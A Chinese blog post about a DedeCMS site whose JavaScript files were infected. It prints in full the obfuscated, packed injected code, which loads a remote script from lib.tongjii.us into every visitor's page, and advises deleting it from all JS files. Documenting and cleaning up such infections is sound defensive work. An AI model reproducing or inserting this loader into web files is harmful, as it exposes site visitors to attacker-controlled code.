当前位置:首页 > 计算机相关 > 建站之路 > 正文内容

lib.tongjii.us 病毒分析 DEDECMS被植入此病毒

piikee6年前 (2017-06-17)建站之路363
很久以前,369手游网一直打开被谷歌浏览器提示提示页面有病毒,一开始以为自己浏览器被什么病毒劫持或者DNS劫持。最近重启369手游网,又出现这个问题,分析了一下找到了原因。原来是网站被植入病毒了。所有JS页面都被放入这段代码:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('12(T(p,a,c,k,e,d){e=T(c){U(c<a?\'\':e(1f(c/a)))+((c=c%a)>1e?W.1d(c+1h):c.13(11))};X(!\'\'.V(/^/,W)){Y(c--){d[e(c)]=k[c]||e(c)}k=[T(e){U d[e]}];e=T(){U\'\\\\w+\'};c=1};Y(c--){X(k[c]){p=p.V(10 14(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}U p}(\'v(l(p,a,c,k,e,d){e=l(c){m c.n(z)};q(!\\\'\\\'.t(/^/,B)){r(c--){d[c.n(a)]=k[c]||c.n(a)}k=[l(e){m d[e]}];e=l(){m\\\'\\\\\\\\w+\\\'};c=1};r(c--){q(k[c]){p=p.t(C D(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c])}}m p}(\\\'1 4=4||[];(b(){1 2=5.e(\\\\\\\'7\\\\\\\');2.a=\\\\\\\'8://9.d.f/k.6?//i.6?g\\\\\\\';1 3=5.j(\\\\\\\'7\\\\\\\')[0];3.h.c(2,3)})();\\\',o,o,\\\'|y|u|s|E|x|A|G|Q|N|P|l|R|S|O|L|M|F|H|I|K\\\'.J(\\\'|\\\'),0,{}))\',Z,Z,\'|||||||||||||||||||||T|U|13|17||X|Y||V|1m|12||1q|1r|11|1n|W|10|14|1l|1o|1c|1k|1i|15|1j|1s|1p|1g|19|18|16|1b|1a\'.15(\'|\'),0,{}))',62,91,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||function|return|replace|String|if|while|55|new|36|eval|toString|RegExp|split|http|21|src|createElement|tongjii|insertBefore|script|fromCharCode|35|parseInt|lib|29|getElementsByTagName|tj|google|_hmt_en|hm_en|js|parentNode|41d12a21b4e1a726d4a651685b118811662033874|document|var|us'.split('|'),0,{}))

解决办法:
所有JS文件查找一下这段代码删除即可。。

扫描二维码推送至手机访问。

版权声明:本文由萍客小居发布,如需转载请注明出处。

本文链接:https://www.piikee.net/1259.html

分享给朋友:

相关文章

bo blog出错

死人了,要考试,居然还一天没复习,刚刚想复习,却看到博客有新版,结果升级新版出现问题,备份数据库,重新全新安装,结果,数据库字段出错无法导入备份啊啊啊疯了!好不容易,才找到出错字段,原来是以前加入一个博文自动发QQ空间的插件,结果修改了数据...

血染的互联网 全国封网祭

也许我被关,将不再回来你是否理解,你是否明白也许我倒下,将不再起来你是否还要永久的期待如果是这样,你不要悲哀互联网的旗帜上有我们血染的风采如果是这样,你不要悲哀互联网的旗帜上有我们血染的风采也许我的页面,再不能打开你是否理解我沉默的情怀也许...

asp站点com1.gupiao.asp,prn.gupiao.asp木马清除方法

很不幸,不知什么时候网站被挂马了!网站的跟目录被加了几个文件,怎么删也删不掉,而且过一段时间还会自动在 ASP 的网站首页插一段<div class=sera><ul><li style='float:left...

netfirms免费空间去广告代码

netfirms免费空间头部都有一个广告条,把下面代码放入body 里面即可实现隐藏广告条。<script><!-- 转载请注明来自萍客小居www.piikee.net -->var table1 = documen...

一段邪恶的MYSQL数据库修复命令。。。

好吧,MYSQL坏了就用他。。。虽然哥的MYSQL还没坏过。。首先,服务器开始菜单->运行>输入cmd->出现了个东东。。。在这个东东里面呢,不断输入“cd..”直到出现C:\>,然后邪恶的事情开始了。输入你的MYS...

解决PHP-CGI爆满问题

解决PHP-CGI爆满问题在C:\WINDOWS\system32\inetsrv\fcgiext.ini 文件中可以设定php-cgi进程相关参数,如:打开这个文件, 并用查找的方式 来查找maxInstances=把这个值改小建议 51...

lillian
lillian
5年前 (2018-01-12)

赞!

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。